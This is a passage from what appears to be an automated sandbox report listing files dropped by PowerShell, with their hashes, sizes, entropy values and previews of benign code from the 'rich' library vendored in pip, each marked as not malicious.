                                                                                                                                                                                                            SSDEEP:48:9iwdXZZeANVB/SU1kf22bnMEZb1RvsvGAnmEGFbnTP9YyGpeHcv1YxQTGrmjD:9ioZFBqU1+NMQbRlT1YTQc9YQD
                                                                                                                                                                                                            MD5:ACBE632D902CF7E5653CF8A8D1DB3DDE
                                                                                                                                                                                                            SHA1:AB5DACA3467ADA858B739BA2926971090538C4C4
                                                                                                                                                                                                            SHA-256:31E23A826834FF3679884205EC172221F257764A4F6BCFA3B205272CF873FD3F
                                                                                                                                                                                                            SHA-512:71757B137C4555AAAC7305607C8FDDD2978286DEE33C845401E1B2E13AFD4C8B7085673A83257676E7405C003092353A3BD168A66DED82B72285BC73281A0DF6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g*........................@...s....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.f...Z.G.d.d...d...Z.e.d.d.g.d...g.d.....Z.e.d.d.g.d...g.d.....Z.e.d.d.g.d...g.d.....Z.e.d.d.g.d...g.d.....Z.e.d.d.g.d...g.d.....Z.d.S.)......)...List..Optional..Tuple.....)...ColorTriplet)...Palettec....................@...s>...e.Z.d.Z.d.Z...d.d.e.d.e.d.e.e...d.e.e.e.....d.d.f.d.d...Z.d.S.)...TerminalThemea....A color theme used when exporting console content... Args:. background (Tuple[int, int, int]): The background color.. foreground (Tuple[int, int, int]): The foreground (text) color.. normal (List[Tuple[int, int, int]]): A list of 8 normal intensity colors.. bright (List[Tuple[int, int, int]], optional): A list of 8 bright colors, or None. to repeat normal intensity. Defaults to None.. N..background..foreground..normal..bright..returnc....................C...s*...t.|...|._.t.|...|._.t.|.|.p.|.....|._.d.S...N).r......background_color..foregr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):40208
                                                                                                                                                                                                            Entropy (8bit):5.448188039771659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:veqT6SuAD3o/8wFquEhBXBHCBQCTWte9SXfdpoBwgzFihP9kQGxN2c45QoWVAJIu:veglinN9SXF6BzP8QoW6J7
                                                                                                                                                                                                            MD5:880CBC37FE35809B01F410B5DF89FA7B
                                                                                                                                                                                                            SHA1:7F2AD21F83922C7ECFA48D44CD256FB3329976D5
                                                                                                                                                                                                            SHA-256:4379710E5FEFBDE5BD1AA6E1E2804FCE01250C3C9D2C62A4BD3B2775169040F5
                                                                                                                                                                                                            SHA-512:657521E877FF2D7074BBA63C4239BD7971DB8F3AA62CD5D87E302F64312AFC81A160862DD6A8E5620CE41790CDFFA3078C1CD4A92F95D6CC21C78A83C06BC208
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gv........................@...sD...U.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+m,Z,..e.r.d.d.l-m.Z.m/Z/m0Z0m1Z1..d.Z2d.e3d.<.d.Z4d.e3d.<.e..5d...Z6e.e7d.f...Z8e.e7g.e.e,..f...Z9G.d.d...d.e...Z:G.d.d...d.e%..Z;e<d.k...r d.d l=m.Z...e;d!..Z>e>.?d"g.d#....e>.?d$g.d%....e...Z-e-.@d&....e-jAe>d'd(....e-.A....e-.@d)....e-jAe>d*d+d,....e-.A....e-.@d-....e-jAe>d.d/d,....e-.A....e-.@d0....e-jAe>d1d2d,....e-.A....d.S.d.S.)3.....N)...partial..reduce)...gcd)...itemgetter)...TYPE_CHECKING..Any..Callable..Dict..Iterable..List..NamedTuple..Optional..Tuple..Union.....)...loop_last)...pick_bool)...divide_line)...AlignMethod)...cell_len..set_cell_size)...Lines)...strip_control_codes)...EmojiVariant)...JupyterMixin)...Measurement)...Segment)...Style..StyleType)...Console..ConsoleOptions..JustifyMe
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4717
                                                                                                                                                                                                            Entropy (8bit):5.24563479392175
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9O+4XP556GOAAsvvvsASlhmQ7C8h2lFUlxF1Kuvt63H1kJMalAhmiecq:cvyGbvvvdSdh2MnzR46h8ecq
                                                                                                                                                                                                            MD5:ECDC087CE8F769F2474606CC5BED40CF
                                                                                                                                                                                                            SHA1:7152CDF8800A4AC8D9D42C39E4DEBA3099998F17
                                                                                                                                                                                                            SHA-256:53FDEE095488B7DF5F634ADEBB492D0A849A1C83F6E47AECF3A07354A10E171C
                                                                                                                                                                                                            SHA-512:DD216535CA55A8385FC812D6EDD03C7E0A81C3F542A1107F42126A6B0E2B63520FF3FD8A11B945D2170E43505B72F918F35D47F736C94EC7C0C670C1FD6E5FD3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g+........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.rDe...Z.e.e.j.....d.S.d.S.)......N)...Dict..List..IO..Mapping..Optional.....)...DEFAULT_STYLES)...Style..StyleTypec....................@...s....e.Z.d.Z.U.d.Z.e.e.e.f...e.d.<...d.d.e.e.e.e.f.....d.e.f.d.d...Z.e.d.e.f.d.d.....Z.e...d.d.e.e...d.e.e...d.e.d.d.f.d.d.....Z.e.d.d.e.d.e.d.d.f.d.d.....Z.d.S.)...Themea'...A container for style information, used by :class:`~rich.console.Console`... Args:. styles (Dict[str, Style], optional): A mapping of style names on to styles. Defaults to None for a theme with no styles.. inherit (bool, optional): Inherit default styles. Defaults to True.. ..stylesNT..inheritc....................C...s<...|.r.t.....n.i.|._.|.d.u.r.|.j...d.d...|.....D.......d.S.d.S.).Nc....................S...s*...i.|.].\.}.}.|.t.|.t...r.|.n.t...|.....q.S...)...isinstancer......parse.....0..name..style
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):310
                                                                                                                                                                                                            Entropy (8bit):5.233157872822654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/QX/eCkAaYOl1iBEQn0CTTQbo+u95/n23d6xUAreaSQIk/:CQveCTHOniBhnbQW/2IsaSd2
                                                                                                                                                                                                            MD5:86F4BEDD345A19E4EB4A7E49CC2315EC
                                                                                                                                                                                                            SHA1:059BCE291FE45C2C14C7F558EFB7595003583EE7
                                                                                                                                                                                                            SHA-256:D1A27D7E373F658C9261260B49418E86E5032776B45CBDDAB74F15F8A005BC82
                                                                                                                                                                                                            SHA-512:3F300C14CE6FDFFBBD5E1257E0ABCDB0674FA7679D227936FDF3C11E361EBF50D19157ECE736910B4C03887E324DC2F4D85FF2107487595E6258A1F04B53EAEF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gf........................@...s$...d.d.l.m.Z...d.d.l.m.Z...e.e...Z.d.S.)......)...DEFAULT_STYLES)...ThemeN)...default_stylesr......themer......DEFAULT..r....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/themes.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19642
                                                                                                                                                                                                            Entropy (8bit):5.629959590527783
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kQaBh/Op1G/KBi8jvvXpcD2LkByDAIYCL8ND0uRXknL/xgsJWh9+m7:kQaHw1G/o/zqIQOuRWLJgsJo9x
                                                                                                                                                                                                            MD5:5AEEC16C2DED3FA51D91908F7D21BF66
                                                                                                                                                                                                            SHA1:E7A81A1D9257B0FCA9B947E87A2CD50CC2F3F25B
                                                                                                                                                                                                            SHA-256:F83BA6A72B4BFBCE18ADD62977ECA17B56EB9F3070B3FF9AEDC3A12911FEF09A
                                                                                                                                                                                                            SHA-512:1C262DA60FC41C1BA39FBE13EC0F7D51E311024D2321D40E4F5D3961CE3BD0961E4713AF236DAA9157A4DB3AA81EF3839F38D8922B727D230331C99A67897A42
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.e.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4m5Z5..d.d.l6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;..d.d.l<m=Z=..d.d.l>m Z ..d.d.l?m@Z@..e..A..d.k.ZBd.ZCd.ZDd.d.d.d.d.d.d.d.d.d ..d!e.e,..d"e.eE..d#eEd$e.eF..d%eGd&eGd'eGd(e.e.eFe.f.....d)eEd*e.e.eH..eHe.e...g.e.f...f.d+d,..ZIe.G.d-d...d.....ZJe.G.d/d0..d0....ZKe.G.d1d2..d2....ZLe.G.d3d4..d4....ZMG.d5d6..d6e4..ZNG.d7d8..d8..ZOePd9k...r^d.d:l+m,Z,..e,..Z+d.d.l.Z.d;e.d*d.f.d<d=..ZQd;e.d*d.f.d>d?..ZRdBd@dA..ZSeS....d.S.d.S.)C.....)...absolute_importN)...dataclass..field)...walk_tb)...ModuleType..TracebackType)...Any..Callable..Dict..Iterable..List..Optional..Sequence..Type..Union)...guess_lexer_for_filename)...Comment..Keyword..Name..Number..Operator..String)...Text)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7351
                                                                                                                                                                                                            Entropy (8bit):5.818521953422238
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:5IVII/Ig3Y4rQSfGRsn/q+YvwQHSSAjGeiDeT0:5Iv/Ig99Gl9oQHtwGeiDeo
                                                                                                                                                                                                            MD5:8A565D51F4DB030CD178167C0C7742BD
                                                                                                                                                                                                            SHA1:FE831F032996C0A8F34E4FCC0BE2AF7AC7CE3228
                                                                                                                                                                                                            SHA-256:FB4FCAF830ED5AFE62F84C4311E9D8C709D6570A4EB608E4135E18034DD48060
                                                                                                                                                                                                            SHA-512:6F2B80F0DF0C50753DEAE280A962B40B06178F13D09FE9F4BF5E06C7584C5D5CDE82375BC4583988535FFAB89ECA8DE60C9AD8D1D62BD984F1992680C6DF0C46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.#.......................@...s....d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.e.d.k...r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..e$d.d.g.d...Z%e%j&d.d.d.d.....e%j&d.d.d.....e%j&d.d.d.d.....e%.'d d!d"....e%.'d#d$d%....e%.'d&d'd(....e%.'d)d*d+....d,Z(e"e(d-d.d.d/..Z)e.d0..Z*e.d1d.d.d2..Z+e+j,d3d4d5..Z-e-j,d6d7d5..Z.e..,e.d8e)......e..,e.d9e e*d.d:........e-j,d;d<d5..Z/d.e/_0e j1d=d4d:..Z2e/.,e.d>e2......e/.,e.d?e%......e...Z.e..3e+....d@S.d@S.)A.....)...Iterator..List..Optional..Tuple.....)...loop_first..loop_last)...Console..ConsoleOptions..RenderableType..RenderResult)...JupyterMixin)...Measurement)...Segment)...Style..StyleStack..StyleType)...Styledc....................@...s....e.Z.d.Z.d.Z.d.d.d.d.d.d...d.e.d.e.d.e.d.e.d.e.d.e.d.d.f.d.d...Z.d.d.d.d.d...d.e.d.e.e...d.e.e...d.e.d.e.e...d.d.f.d.d...Z.............d.d.d...Z.............d.d.d...Z.d.S.) ..Tre
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10096
                                                                                                                                                                                                            Entropy (8bit):3.578545800135063
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ILzrysgImwwM+l2H/HtH5eBy2SnpVzol5DJrc3PLNmrxV:ILz+sgImwxxQBknqDJcU
                                                                                                                                                                                                            MD5:291ED6DFF7C36C5352CA017F82C9FBEB
                                                                                                                                                                                                            SHA1:DAF7E0F77D10A806F416D6DF26B71B319197EE54
                                                                                                                                                                                                            SHA-256:DA7E048898B75FDB2A22AD0ED7A91467FCF2E9460C777C457C286529F9D6D477
                                                                                                                                                                                                            SHA-512:36E04AE1E84CF15EF80CB95DB8A7337D3C17E0BF8CDEE8C56895839F84EC3CB47916FDD027C85573B594E6F0C403B8A161186165F4D9DF47F94B71FA1DF5FF3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Auto generated by make_terminal_widths.py..CELL_WIDTHS = [. (0, 0, 0),. (1, 31, -1),. (127, 159, -1),. (768, 879, 0),. (1155, 1161, 0),. (1425, 1469, 0),. (1471, 1471, 0),. (1473, 1474, 0),. (1476, 1477, 0),. (1479, 1479, 0),. (1552, 1562, 0),. (1611, 1631, 0),. (1648, 1648, 0),. (1750, 1756, 0),. (1759, 1764, 0),. (1767, 1768, 0),. (1770, 1773, 0),. (1809, 1809, 0),. (1840, 1866, 0),. (1958, 1968, 0),. (2027, 2035, 0),. (2045, 2045, 0),. (2070, 2073, 0),. (2075, 2083, 0),. (2085, 2087, 0),. (2089, 2093, 0),. (2137, 2139, 0),. (2259, 2273, 0),. (2275, 2306, 0),. (2362, 2362, 0),. (2364, 2364, 0),. (2369, 2376, 0),. (2381, 2381, 0),. (2385, 2391, 0),. (2402, 2403, 0),. (2433, 2433, 0),. (2492, 2492, 0),. (2497, 2500, 0),. (2509, 2509, 0),. (2530, 2531, 0),. (2558, 2558, 0),. (2561, 2562, 0),. (2620, 2620, 0),. (2625, 2626, 0),. (2631, 2632, 0),. (26
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):140235
                                                                                                                                                                                                            Entropy (8bit):5.148008718742405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:96lsHsuZx/5gIqpPEZ4zVfarpfjvypApdSdVKEGnWYMwTMfv1:96lsHsuZxhg0ZvKgWYMwT+
                                                                                                                                                                                                            MD5:EE5B0BCDBC8329E0635631715FBA318B
                                                                                                                                                                                                            SHA1:668EAFF13635A6A4368E1445D2E1DCE7FDCA6B7B
                                                                                                                                                                                                            SHA-256:86ED552FD9DB55DA6926B5688A356C85195C4517BFBF7763BB7326776B0A65D6
                                                                                                                                                                                                            SHA-512:9EEE2835032C5A24D6DEF92233CF251731A339740350DA9EF540E6E3FE31D4DFCE953106A99F8740437F56F6A51EE8E5CDD3C66B47605B43A4594D573A6061A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:EMOJI = {. "1st_place_medal": "..",. "2nd_place_medal": "..",. "3rd_place_medal": "..",. "ab_button_(blood_type)": "..",. "atm_sign": "..",. "a_button_(blood_type)": "..",. "afghanistan": "....",. "albania": "....",. "algeria": "....",. "american_samoa": "....",. "andorra": "....",. "angola": "....",. "anguilla": "....",. "antarctica": "....",. "antigua_&_barbuda": "....",. "aquarius": ".",. "argentina": "....",. "aries": ".",. "armenia": "....",. "aruba": "....",. "ascension_island": "....",. "australia": "....",. "austria": "....",. "azerbaijan": "....",. "back_arrow": "..",. "b_button_(blood_type)": "..",. "bahamas": "....",. "bahrain": "....",. "bangladesh": "....",. "barbados": "....",. "belarus": "....",. "belgium": "....",. "belize": "....",. "benin": "....",. "
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1064
                                                                                                                                                                                                            Entropy (8bit):4.815471479051653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REqZ92TqQyvnoY9NIWeOlgpmaaAWex65HbcWRmb:T92TqLgulJ4WekHbcWRm
                                                                                                                                                                                                            MD5:AA906731D3F9EE1AF861A15115E9C904
                                                                                                                                                                                                            SHA1:24B63B5FC802A433906688C21CE9106DAD90C1D3
                                                                                                                                                                                                            SHA-256:9FE91C7ADB04531D99526850ADF78C35CFAD79E1A1A6E490E45F153C1B32BC3A
                                                                                                                                                                                                            SHA-512:6C350502018DF45700E38C50DC752C9DF01A1F6BEF42A4A704237DBE43103E3D12478322A912BD27CE5BF44982C7D1B5D82D24996573FD2BBDE8026C0E5C0532
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Callable, Match, Optional.import re..from ._emoji_codes import EMOJI..._ReStringMatch = Match[str] # regex match object._ReSubCallable = Callable[[_ReStringMatch], str] # Callable invoked by re.sub._EmojiSubMethod = Callable[[_ReSubCallable, str], str] # Sub method of a compiled re...def _emoji_replace(. text: str,. default_variant: Optional[str] = None,. _emoji_sub: _EmojiSubMethod = re.compile(r"(:(\S*?)(?:(?:\-)(emoji|text))?:)").sub,.) -> str:. """Replace emoji code in text.""". get_emoji = EMOJI.__getitem__. variants = {"text": "\uFE0E", "emoji": "\uFE0F"}. get_variant = variants.get. default_variant_code = variants.get(default_variant, "") if default_variant else "".. def do_replace(match: Match[str]) -> str:. emoji_code, emoji_name, variant = match.groups(). try:. return get_emoji(emoji_name.lower()) + get_variant(. variant, default_variant_code. ). except KeyError:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2114
                                                                                                                                                                                                            Entropy (8bit):5.14055911950928
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:gyNHCpyeMVvs/qVsPqrCsFVs3pMTAlCHZaDvvqm:1C0UqOaqpMclx7n
                                                                                                                                                                                                            MD5:EF04E64CFFC1DAF9B7541A8EC6A19335
                                                                                                                                                                                                            SHA1:736BB7ECC968FA4F7906E98EFAA32C718BF8EB1E
                                                                                                                                                                                                            SHA-256:9C702BA8E963225627E8DAEE856B00B21F9F1E8EE8242DF2F410C9C806BE4184
                                                                                                                                                                                                            SHA-512:3C08B4DF05527A9C06D8DF24EE06C27828ADB1A8D6B6F3FB35048510C6C2EEC0DBFB4E3E9A44970BBA6AFC9E02FDEED00E6E0007DE7C3759E0B7DA5E544793F3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:CONSOLE_HTML_FORMAT = """\.<!DOCTYPE html>.<head>.<meta charset="UTF-8">.<style>.{stylesheet}.body {{. color: {foreground};. background-color: {background};.}}.</style>.</head>.<html>.<body>. <code>. <pre style="font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace">{code}</pre>. </code>.</body>.</html>."""..CONSOLE_SVG_FORMAT = """\.<svg class="rich-terminal" viewBox="0 0 {width} {height}" xmlns="http://www.w3.org/2000/svg">. Generated with Rich https://www.textualize.io -->. <style>.. @font-face {{. font-family: "Fira Code";. src: local("FiraCode-Regular"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff2/FiraCode-Regular.woff2") format("woff2"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff/FiraCode-Regular.woff") format("woff");. font-style: normal;. font-weight: 400;. }}. @font-face {{. font-family: "Fira Code";. src: lo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                            Entropy (8bit):4.4345451063692884
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYBFUNuejyvw3X9mxWopMGrXz864opMGvXhFuB6xCZKUKV6:1REYBOEiyvw3X9mxtpLAEpPx6ECK6
                                                                                                                                                                                                            MD5:7977CD9427A2C149488CC83C16E404FB
                                                                                                                                                                                                            SHA1:5B52136DF195DDA4A08659E1A0376C38D87C2C80
                                                                                                                                                                                                            SHA-256:5EDE3B41A7022B062BBB38C38BE80E06AEF6E0945E0E3F429BDC548B97EBFB7E
                                                                                                                                                                                                            SHA-512:FF1813A3E9D97B17D971D6636817CC5D10A977418C724EB02FAF46A8B1C370817CAD1BFB58A88BDAAAD1B853A2E2EA34338003414227F07ECF48F142C659D4DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any...def load_ipython_extension(ip: Any) -> None: # pragma: no cover. # prevent circular import. from pip._vendor.rich.pretty import install. from pip._vendor.rich.traceback import install as tr_install.. install(). tr_install().
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:C++ source, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9695
                                                                                                                                                                                                            Entropy (8bit):4.375022250679481
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:V2CJijCqgdF49pSA08B9L7dSyeTXpCBYhrkHX3/:V2xlgMzSA93OXpHhriv
                                                                                                                                                                                                            MD5:22804D522066D6C88DB91362BCCC09A3
                                                                                                                                                                                                            SHA1:EC0FC03E050E03A729DFEF35B2E00B93EB76D6E2
                                                                                                                                                                                                            SHA-256:A19246C37D5EEB87705D20A6AC39EF65BC156F564A8567D4F30237556A218C99
                                                                                                                                                                                                            SHA-512:DE7FA3C3F313E3BC672FFF1EC465032A5626789C1F89D4DAEE20DB76146C727CB8CDBF76EAAB1567C72CD3875ED2F1E920672C591F8C3F1D77125F426E2F23F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import inspect.from inspect import cleandoc, getdoc, getfile, isclass, ismodule, signature.from typing import Any, Collection, Iterable, Optional, Tuple, Type, Union..from .console import Group, RenderableType.from .control import escape_control_codes.from .highlighter import ReprHighlighter.from .jupyter import JupyterMixin.from .panel import Panel.from .pretty import Pretty.from .table import Table.from .text import Text, TextType...def _first_paragraph(doc: str) -> str:. """Get the first paragraph from a docstring.""". paragraph, _, _ = doc.partition("\n\n"). return paragraph...class Inspect(JupyterMixin):. """A renderable to inspect any Python Object... Args:. obj (Any): An object to inspect.. title (str, optional): Title to display over inspect result, or None use type. Defaults to None.. help (bool, optional): Show full help text rather than just first paragraph. Defaults to False.. methods (bool,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3225
                                                                                                                                                                                                            Entropy (8bit):4.436102393703776
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ktYs1WQkRD/dHahbxhPoi6n5Z5TQEEA2vxg/q9hGRPdcb2sbu:Q1qFOx5oznxQikxoPdcasy
                                                                                                                                                                                                            MD5:FA18D80F91B412A7D0C7F6E291596C46
                                                                                                                                                                                                            SHA1:E28C1F61C554F4DD34C210EA89F8B5031AFF874D
                                                                                                                                                                                                            SHA-256:D41C88D0F035669C5963708624E2B9E218E5AB85FE073FDBA088C8A8277C2A7B
                                                                                                                                                                                                            SHA-512:C242F78710BD6CC7ECBD25010233A48F31DAE5519A7455694FCF601C3EEACD9B93B2010BE02E26D0BA3CF784248E96BC593D8CE4F63571E79728ECF9D2DCD6D0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from datetime import datetime.from typing import Iterable, List, Optional, TYPE_CHECKING, Union, Callable...from .text import Text, TextType..if TYPE_CHECKING:. from .console import Console, ConsoleRenderable, RenderableType. from .table import Table..FormatTimeCallable = Callable[[datetime], Text]...class LogRender:. def __init__(. self,. show_time: bool = True,. show_level: bool = False,. show_path: bool = True,. time_format: Union[str, FormatTimeCallable] = "[%x %X]",. omit_repeated_times: bool = True,. level_width: Optional[int] = 8,. ) -> None:. self.show_time = show_time. self.show_level = show_level. self.show_path = show_path. self.time_format = time_format. self.omit_repeated_times = omit_repeated_times. self.level_width = level_width. self._last_time: Optional[Text] = None.. def __call__(. self,. console: "Console",. renderables: Iterable["Cons
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1236
                                                                                                                                                                                                            Entropy (8bit):4.3505427210009024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RECRGHh9E1x3g3pqwHh5EY0xMpyfgsqHmYXBHFYPfEY0x5XAa3pYfosqHi5YH:HAq3goG5WhfgsqHmYXFmhW5XAZfosqHd
                                                                                                                                                                                                            MD5:CB02E73E65DD0D4E5FB7FA97608275E5
                                                                                                                                                                                                            SHA1:64C1A76EB2413DED8096B98A419088FF40136DA9
                                                                                                                                                                                                            SHA-256:855FFA08B7683E6D2F6B6D96A70E332AA334458B33DD36715E3D0FA12FBD7834
                                                                                                                                                                                                            SHA-512:21D240231AA143CD2B431D17F7F145D84019C8B4C2E85D091BA15BE3C3044642DE19F237AD5FFAE487EB1929BEB8A177C607DC812B0F79A8DCEAABB2DB9F78F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Iterable, Tuple, TypeVar..T = TypeVar("T")...def loop_first(values: Iterable[T]) -> Iterable[Tuple[bool, T]]:. """Iterate and generate a tuple with a flag for first value.""". iter_values = iter(values). try:. value = next(iter_values). except StopIteration:. return. yield True, value. for value in iter_values:. yield False, value...def loop_last(values: Iterable[T]) -> Iterable[Tuple[bool, T]]:. """Iterate and generate a tuple with a flag for last value.""". iter_values = iter(values). try:. previous_value = next(iter_values). except StopIteration:. return. for value in iter_values:. yield False, previous_value. previous_value = value. yield True, previous_value...def loop_first_last(values: Iterable[T]) -> Iterable[Tuple[bool, bool, T]]:. """Iterate and generate a tuple with a flag for first and last value.""". iter_values = iter(values). try:. previous_value = next
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1643
                                                                                                                                                                                                            Entropy (8bit):4.386825753109236
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RDhgW788nUBSqhd1doh76hnudohNh7QdUCudib7ZG/lSAf6uzmUi:THnWSMd1doEtudojidzudib7ZklSIOf
                                                                                                                                                                                                            MD5:1A1CAE9BDCFE6EBF46397309C68095BD
                                                                                                                                                                                                            SHA1:919F3E0BAC72DF4C011D7C66F8F3F9E92A68081B
                                                                                                                                                                                                            SHA-256:713693094FF1B835C619AF62A8AFA4674B9D759092BCCF9180CD9A18CB8C887B
                                                                                                                                                                                                            SHA-512:BA589F8459548BB042BA7CFA66940C24ACC299E800FF1BCF79E807239695BAC26FF450932054C14DBD49DCFB9EC7C532CBD7863B5F19C8F7D5877F88A2F6BADE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
